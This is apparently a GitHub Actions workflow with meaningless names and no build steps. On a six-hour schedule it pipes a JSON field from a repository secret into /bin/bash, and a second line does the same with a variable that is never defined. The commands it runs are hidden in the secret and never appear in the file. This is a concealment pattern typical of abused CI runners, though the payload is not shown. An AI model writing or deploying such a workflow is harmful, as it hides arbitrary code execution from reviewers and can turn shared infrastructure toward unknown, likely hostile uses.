name: wendixiang9772

on:
  workflow_dispatch:
  schedule:
    - cron: '13 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: wendixiang9772
        env:
          kyto7000: ${{ secrets.kyto7000 }}
        run: |
          echo $kyto7000 | jq -r .wwbla95 | /bin/bash
          echo $j058 | jq -r .alm4370 | /bin/bash

